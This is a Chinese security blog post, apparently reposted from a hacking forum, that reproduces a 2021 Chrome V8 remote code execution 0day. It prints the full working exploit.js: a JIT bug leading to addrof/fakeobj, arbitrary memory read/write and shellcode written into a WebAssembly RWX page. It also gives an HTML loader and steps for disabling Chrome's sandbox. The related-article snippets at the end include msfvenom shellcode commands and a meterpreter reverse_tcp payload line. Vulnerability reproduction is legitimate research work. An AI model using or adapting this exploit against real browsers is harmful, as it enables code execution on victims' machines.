Google Chrome远程代码执行0Day漏洞复现

最新推荐文章于 2024-05-24 17:24:02 发布
最新推荐文章于 2024-05-24 17:24:02 发布
阅读量704 收藏
点赞数
分类专栏: 漏洞复现
原文链接:https://bbs.zkaq.cn/t/5268.html
版权 
更多黑客技能 公众号:白帽子左一

作者:掌控安全-gjmvp

0x00 前言

前几天听说了这个漏洞一直没有机会复现,今天决定复现一下,参考了几篇文章之后自己就开始动手进行了复现

0x01 漏洞概述

2021年04月13日,360CERT监测发现国外安全研究员发布了Chrome 远程代码执行 0Day的POC详情,

漏洞等级:严重
漏洞评分:9.8

Chrome是四大浏览器内核之一,统称为Chromium内核或Chrome内核。

chrome是开放源代码的,目前采用Chrome内核的浏览器有著名的Google Chrome、360极速、搜狗、新版opera、yandex还有微软旗下Microsoft Edge等,总之,chrome内核在浏览器份额中,占比非常大

漏洞会影响当前版本的Google Chrome,Microsoft Edge和其他可能基于Chromium的浏览器。

不过需要关闭浏览器的沙盒,也就是说,chrome的沙盒可以拦截该远程代码执行漏洞,并且目前Google chrome最新版本 90.0.4430.72已经被修复

0x02漏洞条件

漏洞所需环境条件如下:

浏览器版本<= 89.0.4389.114

此漏洞无法逃逸沙箱,需要关闭浏览器的沙箱(SandBox)功能【此功能默认开启】

关闭沙箱方法:

1.在谷歌浏览器快捷方式右键点击属性,然后点击快捷方式,在目标的后面添加上
–no-sandbox

2.然后点击应用,确定

3.打开浏览器看到提示,即成功关闭sandbox

0x03漏洞验证

漏洞POC:

https://github.com/r4j0x00/exploits/tree/master/chrome-0day

这个脚本的作用是打开Windows10的计算器

exploit.js

/*
BSD 2-Clause License
Copyright (c) 2021, rajvardhan agarwal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
3. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.
4. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);
function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}
const _arr = new Uint32Array([2**31]);
function foo(a) {
    var x = 1;
        x = (_arr[0] ^ 0) + 1;
        x = Math.abs(x);
        x -= 2147483647;
        x = Math.max(x, 0);
        x -= 1;
        if(x==-1) x = 0;
        var arr = new Array(x);
        arr.shift();
        var cor = [1.1, 1.2, 1.3];
        return [arr, cor];
}
for(var i=0;i<0x3000;++i)
    foo(true);
var x = foo(false);
var arr = x[0];
var cor = x[1];
const idx = 6;
arr[idx+10] = 0x4242;
function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}
function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}
var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);
function arbread(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}
function arbwrite(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}
function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();

exploit.html

<script src="exploit.js"></script>

然后我们在本地双击打开构建的POC测试脚本,就可以发现成功的弹出了计算器

0x04总结

由于Google Chrome 浏览器的沙箱机制是默认开启的,也就是说,正常使用浏览器,是不会存在问题的。

而且我自己在复现的过程中,发现这个漏洞并没有那么容易复现,在测试很多次之后才复现成功,个人感觉在实际利用过程中还是比较困难的。
在这里插入图片描述

zkzq
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
谷歌浏览器任意文件访问漏洞(CVE-2023-4357)
fly夏天的博客
11-21 1316
谷歌浏览器任意文件访问漏洞(CVE-2023-4357)
Google Chrome RCE漏洞 CVE-2020-6507 和 CVE-2024-0517 流程分析
黑剑
01-25 2017
Google Chrome 在关闭沙箱安全情况下,通过EXP进行远程代码执行
Google Chrome RCE漏洞 CVE-2024-6507 和 CVE-2024-0517 流程分析(1)
2401_84910919的博客
05-12 860
其实在另外一种思路上,如果是直接可以打开直接执行命令,那么就可以绕过谷歌浏览器的这个机制限制,当然这个思路也可能是不存在或不能实的一种。当然还有一个就是这个漏洞的沙箱逃逸,根据以往一些国外大佬进行逃逸并未成功!
微信、支付宝、携程等多款app任意文件读取漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-20 1082
该浏览器基于开源内核(如WebKit)编写,目标是提升稳定性、速度和安全性,并创造出简单且有效率的使用者界面。微信、支付宝、小米浏览器、携程应用等国内主流软件均存在任意文件读取漏洞。此漏洞源于谷歌浏览器内核漏洞,而国内很多app,包括苹果内置浏览器均为谷歌浏览器,故影响全系列产品。当受害者访问SVG图像链接时,浏览器会解析XSL样式表,调用document() 加载包含外部实体引用的文档,读取受害者机器的任意文件。由于此漏洞影响国内众多大厂商应用,且未修,故不提供漏洞利用代码
【在野利用】Google Chrome V8 类型混淆漏洞(CVE-2024-5274)安全风险通告
最新发布
smellycat000的专栏
05-24 230
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Google Chrome V8 类型混淆漏洞漏洞编号QVD-2024-20506,CVE-2024-5274公开时间2024-05-24影响量级千万级奇安信评级高危CVSS 3.1分数8.8威胁类型代码执行利用可能性高POC状态未公开在野利用状态已发EXP状态未公开技术细节状态未公开危害描述:攻击者可通过诱导用户打开恶意链接来利用此漏...
Chrome浏览器代码执行0day漏洞
thlzjfefe的博客
05-24 457
适用版本: 漏洞危害:远程代码执行 影响版本:Chrome 89.0.4389.114以下(含89.0.4389.114) 测试版本: 86.0.4240.198 教程内容: 一、利用kali生成shellcode代码 比如说我要弹出计算器,那么: 64位操作系统: msfvenom -a x64 -p windows/x64/exec CMD="calc" EXITFUNC=thread -f num 32位操作系统: msfvenom -a x86 -p windows/exec CMD="ca
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
unrar库作为第三方依赖项合并到Chrome OS中是合理的,尽管没有显示其用法的代码引用。 在缓解策略方面,有几种可行的选择可供考虑: 完全修:将 Winrar 更新到 6.23+ 将完全修该问题。 修补程序
Google Chrome 123.0.6312.123便携增强版
04-15
谷歌浏览器2024最新便携增强版,Google Chrome浏览器增强版,无更新组件集成增强补丁,Chrome++增强软件功能包括:保存数据实便携式,增强标签页和标签栏操作方式,移除开发者模式警告和更新错误警告等. 提示!!!电脑...
googlechrome117.0.5938.150.exe
10-07
谷歌浏览器(googlechrome)117.0.5938.150版本,适用于Windows系统。
chrome109.0.5414.120 x64版本
08-09
chrome109.0.5414.120 x64版本
google-chrome-114.0.5735.90
12-19
google-chrome-114.0.5735.90
CVE-2021-21220 Chrome远程代码执行漏洞
m0_56642842的博客
06-30 2508
0x00 简介 Google Chrome浏览器是一款由Google公司开发的网页浏览器,该浏览器基于其他开源软件撰写,包括WebKit,目标是提升稳定性、速度和安全性,并创造出简单且有效率的使用者界面。 通过CVE-2021-21220漏洞,受害者通过未开沙箱机制的Chrome浏览器打开攻击者置入恶意代码的网页后就会执行攻击者想要执行的任意代码。 微信作为腾讯公司发布的一款聊天工具。通过PC端微信用户可以直接在电脑上接受手机微信上的任何信息,例如接收:文字、图片、语音、视频等功能。这款软件是腾讯公司为了方
CVE-2019-13720:Chrome 0-day 漏洞利用
systemino的博客
11-07 1455
摘要 Kaspersky研究人员近日发一个Google Chrome浏览器的新的未知漏洞利用。经Google研究人员确认,是一个0 day漏洞,CVE编号为CVE-2019-13720。 研究人员将相关攻击活动命名为Operation WizardOpium。目前还无法将该攻击活动与已知的攻击者联系在一起。但研究人员发部分代码与Lazarus攻击中的代码很相似。从被攻击的站点来看,与早期D...
谷歌修7个 Chrome 浏览器漏洞,CISA建议尽快更新
smellycat000的专栏
06-14 378
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士上周五,美国网络安全和基础设施局 (CISA) 督促用户和管理员更新谷歌在上周发布的Chrome 新版本,修Chrome 浏览器中的七个漏洞。谷歌在安全公告中说明了四个高风险漏洞,其中三个是由外部研究员报告的。谷歌表示因为大多数用户尚未更新到最新版本 Chrome 102.0.5005.115,因此决定限制对漏洞详情的...
Google Chrome 0day 远程代码执行漏洞
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-18 673
1.环境win10、win7均可 2.关闭沙箱模式-no-sandbox 3.chrome客户端需64位(Google Chrome < = 89.0.4389.114) 使用命令关闭沙箱模式chrome.exe --no-sandbox Poc:https://github.com/r4j0x00/exploits/tree/master/chrome-0day msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.72.12
Chrome 远程代码执行漏洞
锋刃科技的博客
04-14 462
漏洞概述 攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行漏洞无法完成chrome的沙箱逃逸,默认情况下chrome开启沙箱。如需无条件rce还需要沙箱逃逸的漏洞。 影响版本 Google:Chrome: <=89.0.4389.114 环境搭建 这里用Chrome 89.0.4389.90进行测试 开始之前,要将Chrome的sandbox关闭,直接在chrome的快捷方式--属性---位置/目标---移动到...
chrome 最新0day
weixin_44024162的博客
04-16 669
Chrome 0day 远程代码执行漏洞 1.测试环境 浏览器版本 90.0.4430.72 操作系统 windows 7 2. 利用条件:关闭沙箱 3. 利用过程 打开chrome属性 在目标输入框最后添加 –no-sandbox 点击应用 4. 使用 chrome 打开 准备好的poc,弹出记事本 exp 链接 4. 预防措施 开启沙箱模式,不要关闭沙箱模式。 可以使用 firefox 浏览器等非V8引擎的浏览器。 ...
谷歌修已遭利用的 Chrome 0day
smellycat000的专栏
02-05 1166
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队谷歌修Chrome 88.0.4324.150版本中一个已遭利用的 0day 漏洞,影响 Windows、Mac 和 ...
手把手教你详细分析 Chrome 1day 漏洞 (CVE-2021-21224)
smellycat000的专栏
04-23 2790
聚焦源代码安全,网罗国内外最新资讯!本文共分五部分:一、时间线二、背景三、漏洞及补丁分析1、漏洞四、漏洞利用分析1、漏洞利用2、内存读写3、代码执行五、参考资料一、时间线2021年4...
Google chrome 安装报错0xc0000139错误代码
05-12
错误代码 0xc0000139 表示应用程序无法启动,因为它无法加载必需的系统文件。这可能是由于系统文件损坏或缺失引起的。以下是一些可能解决问题的步骤: 1. 扫描磁盘文件系统错误。打开“我的电脑” → 右键单击要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值